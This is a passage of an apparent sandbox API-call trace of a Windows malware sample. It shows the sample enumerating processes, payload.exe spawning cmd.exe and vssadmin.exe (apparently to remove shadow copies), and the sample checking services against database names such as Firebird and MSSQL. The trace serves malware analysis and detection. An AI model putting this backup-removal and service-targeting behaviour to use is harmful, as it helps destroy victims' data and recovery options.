(lpString="svchost.exe") returned 11 [0040.963] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.964] lstrlenW (lpString="svchost.exe") returned 11 [0040.964] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.965] lstrlenW (lpString="audiodg.exe") returned 11 [0040.965] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.966] lstrlenW (lpString="svchost.exe") returned 11 [0040.966] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.966] lstrlenW (lpString="svchost.exe") returned 11 [0040.966] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.967] lstrlenW (lpString="dwm.exe") returned 7 [0040.967] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.968] lstrlenW (lpString="explorer.exe") returned 12 [0040.968] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.968] lstrlenW (lpString="spoolsv.exe") returned 11 [0040.968] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.969] lstrlenW (lpString="taskhost.exe") returned 12 [0040.969] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.970] lstrlenW (lpString="svchost.exe") returned 11 [0040.970] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.970] lstrlenW (lpString="taskeng.exe") returned 11 [0040.970] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.971] lstrlenW (lpString="taskhost.exe") returned 12 [0040.971] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0040.972] lstrlenW (lpString="carried trinity.exe") returned 19 [0040.972] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0040.972] lstrlenW (lpString="heaven.exe") returned 10 [0040.972] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0040.973] lstrlenW (lpString="dell.exe") returned 8 [0040.973] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0040.973] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0040.974] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0040.974] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0040.974] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0040.975] lstrlenW (lpString="til ear equal.exe") returned 17 [0040.975] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0040.975] lstrlenW (lpString="itunes-bring.exe") returned 16 [0040.976] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0040.976] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0040.976] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0040.977] lstrlenW (lpString="philadelphia.exe") returned 16 [0040.977] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0040.977] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0040.978] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0040.978] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0040.978] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0040.979] lstrlenW (lpString="fraud stuck.exe") returned 15 [0040.979] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0040.979] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0040.979] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0040.980] lstrlenW (lpString="attended.exe") returned 12 [0041.168] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0041.169] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0041.169] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0041.169] lstrlenW (lpString="pan physician.exe") returned 17 [0041.169] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0041.170] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0041.170] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0041.171] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0041.171] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0041.171] lstrlenW (lpString="over-celebrity.exe") returned 18 [0041.171] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0041.172] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0041.172] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0041.173] lstrlenW (lpString="payload.exe") returned 11 [0041.173] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0041.173] lstrlenW (lpString="cmd.exe") returned 7 [0041.173] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0041.174] lstrlenW (lpString="conhost.exe") returned 11 [0041.174] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0041.175] lstrlenW (lpString="vssadmin.exe") returned 12 [0041.175] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0041.175] lstrlenW (lpString="VSSVC.exe") returned 9 [0041.175] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0041.176] lstrlenW (lpString="svchost.exe") returned 11 [0041.176] Process32NextW (in: hSnapshot=0x1f4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0041.177] CloseHandle (hObject=0x1f4) returned 1 [0041.177] Sleep (dwMilliseconds=0x1f4) [0041.932] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626c58 [0041.932] EnumServicesStatusExW (in: hSCManager=0x626c58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0041.933] GetLastError () returned 0xea [0041.933] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x3fe70d0 [0041.933] EnumServicesStatusExW (in: hSCManager=0x626c58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3fe70d0, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3fe70d0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0041.933] CloseServiceHandle (hSCObject=0x626c58) returned 1 [0041.933] lstrlenW (lpString="Appinfo") returned 7 [0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0041.934] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0041.934] lstrlenW (lpString="AudioSrv") returned 8 [0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0041.934] lstrlenW (lpString="BFE") returned 3 [0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0041.934] lstrlenW (lpString="CryptSvc") returned 8 [0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0041.934] lstrlenW (lpString="CscService") returned 10 [0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0041.935] lstrlenW (lpString="DcomLaunch") returned 10 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0041.935] lstrlenW (lpString="Dhcp") returned 4 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0041.935] lstrlenW (lpString="Dnscache") returned 8 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0041.935] lstrlenW (lpString="DPS") returned 3 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0041.935] lstrlenW (lpString="eventlog") returned 8 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0041.935] lstrlenW (lpString="EventSystem") returned 11 [0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0041.935] lstrlenW (lpString="gpsvc") returned 5 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0041.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0041.936] lstrlenW (lpString="iphlpsvc") returned 8 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0041.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0041.936] lstrlenW (lpString="LanmanServer") returned 12 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0041.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0041.936] lstrlenW (lpString="LanmanWorkstation") returned 17 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0041.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0041.936] lstrlenW (lpString="lmhosts") returned 7 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0041.936] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0041.936] lstrlenW (lpString="MMCSS") returned 5 [0041.936] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0041.936] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0041.936] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0041.936] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0041.937] lstrlenW (lpString="MpsSvc") returned 6 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0041.937] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0041.937] lstrlenW (lpString="Netman") returned 6 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0041.937] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0041.937] lstrlenW (lpString="netprofm") returned 8 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0041.937] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0041.937] lstrlenW (lpString="NlaSvc") returned 6 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0041.937] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0041.937] lstrlenW (lpString="nsi") returned 3 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0041.937] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0041.937] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0041.937] lstrlenW (lpString="PcaSvc") returned 6 [0041.937] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0041.937] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0041.937] lstrcmpiW (lpString1="sqlwriter", 